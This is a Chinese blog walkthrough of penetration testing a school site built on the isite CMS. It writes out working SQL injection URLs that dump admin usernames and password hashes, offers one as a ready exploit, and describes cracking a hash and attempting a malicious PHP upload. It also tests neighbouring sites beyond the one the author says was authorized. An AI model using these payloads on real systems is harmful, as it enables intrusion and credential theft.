首页 安全文摘 漏洞分析 正文

意外发现一套cms的注入漏洞

说明:此次检测为官方授权检测!!!表情包与文章无关正文如下:事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们学校官网,后来朋友他找到了我让我帮助他进行安全检测。我这么菜,但是还是去看看吧。首先我们打开主站访问robots.txt文件,是存在的,可以看出是isite的 cms(在此之前听都没听过….)。去百度了下看下有啥公开的漏洞吧

说明:此次检测为官方授权检测!!!表情包与文章无关

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第1张

正文如下:

事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们学校官网,后来朋友他找到了我让我帮助他进行安全检测。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第2张

我这么菜,但是还是去看看吧。

首先我们打开主站

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第3张

访问robots.txt文件,是存在的,可以看出是isite的 cms(在此之前听都没听过….)。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第4张

去百度了下看下有啥公开的漏洞

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第5张

不得不说用的人真的少,这些漏洞都试了下都没用。

还是看看后台吧,后面加个 艾德密,得到后台通过各种弱口令,都没结果。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第6张

竟然这样,从旁站下手好了,查了下,有这么多。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第7张

我一个个找过去,结果全是这套程序,很无奈啊。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第8张

没办法我硬着头皮看了看主站,随便点了个连接,貌似伪静态啊。试了半天还是放弃了。

继续翻其他站,在一个站的首页发现这个。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第9张

尝试下 post 注入,加个单引号。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第10张

刚准备放弃….过了几秒钟 自动跳转到到了另一个页面。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第11张

继续在搜索框那输入了些查询内容点击检索

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第12张

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第13张

Search 后面多了个 24,于是我加一个单引号………居然报错了(头一次人品爆发)。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第14张

检测语句:and 1=1 和 and 1=2

返回结果

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第15张

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第16张

确定已经存在注入,这次就用手工注入吧。

先 order by 猜下字段长度

http://www.xxx.com/index.php/iss/search/search/24%20order%20by%2010

返回正常 


http://www.xxx.com/index.php/iss/search/search/24%20order%20by%2011

返回错误 


http://www.xxx.com/index.php/iss/search/search/24%20union%20select%201,2,3,4,5,6,7,8,9,10

结果如下

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第17张

没有显错位,加个 and 1=2 试试

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第18张

显错位替换成 database()和 version(),版本是 5.0 以上,有个默认数据库 information

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第19张

User(),不是 root 权限

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第20张

接下来查表名

http://www.xxx.com/index.php/iss/search/search/24%20and%201=2%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10%20from%20information_schema.tables%20where%2 0table_schema=0x6462xxxxxxxxxxx70696E6B5F636F6D

(这是数据库的 hex 码,xxx 代表马赛克……)

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第21张

出来很多啊,用审查元素全部复制下来

flexi_announcement,flexi_bbcode,flexi_channel,flexi_channel_config,flexi_config,flexi_content,flexi_content_subject,flexi_feedback,flexi_file,flexi_file_watermark,flei_inquiry,flexi_link,flexi_link_category,flexi_log,flexi_message,flexi_page,flexi_ search_cache,flexi_tag,flexi_tag_related,flexi_tpl_block,flexi_user,flexi_user_admi n,flexi_u 

起初以为是flexi_user_admin这个表,后来发现帐号密码存在flexi_user这个表中


接下来查他字段http://www.xxx.com/index.php/iss/search/search/24%20and%201=2%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10%20from%20information_schema.columns%20where%20table_name=0x666C6578695F75736572

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第22张

id,name,password,hit_question,hit_answer,email,real_name,gender,birthday,province,address,post_code,phone_code,mphone_code,group_id,reg_time,last_login_time,last_login_ip,login_count,post_count,manager,locked,new_msg_count,memo 

经验判断存放帐号密码的字段是 name和password

http://www.xxx.com/index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user

就这样,帐号密码已经出来了 利用构造出来的 exp: 


index.php/iss/search/search/24%20and%201=2%20union%20select%201,name,3,4,5,6,7,password,9,10%20from%20flexi_user

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第23张

去主站访问下

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第24张

哈哈!!帐号PASS到手,但是我数了一下是40位…….

然后去百度看了看

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第25张

说是 md5的然后我仔细看了看文章…..

好像并没有用,然后我去官网下载了套源码 查看代码发现是 sha1 加密。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第26张

拿起密码就去某MD5解密,悲剧来了………

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第27张

试了试另外一个,也是一样的结果…..

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第28张

然后看了看其他网站(SOMD5),可能真的人品爆发,有个站解密成功了然后登录之。

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第29张

大概看了看网站后台,在这添加上 php

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第30张

找到个上传文件的地方,感觉 鞋奥就在眼前

击上传发现…………我真是个命苦的人啊

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第31张

只能拿出我苦练多年的打狗头方法…….拿起 burp 抓包

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第32张

在这里构造畸形的 http,然后放包,成功上传。(自带滑稽表情)

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第33张

点击放大镜

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第34张

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第35张

源码暴露了,而且路径也不对劲…….

看来这并不是他真实路径,我们又翻了翻,发现了这个,点击检索

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第36张

意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第37张

看到刚才上传的文件,点击源文件路径变成了,多了个下划线…….http://www.xxx.com/data/upload/2017-04/08215611_edit._php

这个问题卡了我两天,各种姿势都试了,还是没办法绕过,所以放弃了。

Ps:这个提供这套 cms 的站点也存在该漏漏


意外发现一套cms的注入漏洞 渗透测试 注入漏洞 CMS 漏洞分析  第38张

原文由微信公众号IT同路人

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1368.html

相关推荐

Google Hack|记一次渗透测试实战

Google Hack|记一次渗透测试实战

说明:此次检测为官方授权检测!!!表情包与文章无关正文如下:事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们...

渗透测试 2年前 (2020-11-01) 0 10965

渗透测试面试问题合集

渗透测试面试问题合集

说明:此次检测为官方授权检测!!!表情包与文章无关正文如下:事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们...

渗透测试 2年前 (2020-08-14) 1 10993

安全技术|BloodHound 使用指南

安全技术|BloodHound 使用指南

说明:此次检测为官方授权检测!!!表情包与文章无关正文如下:事情是这样的某一天在一个安全交流群里聊天,一个朋友说他们老师叫他去检测下他们...

安全工具 2年前 (2020-08-13) 0 10959

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持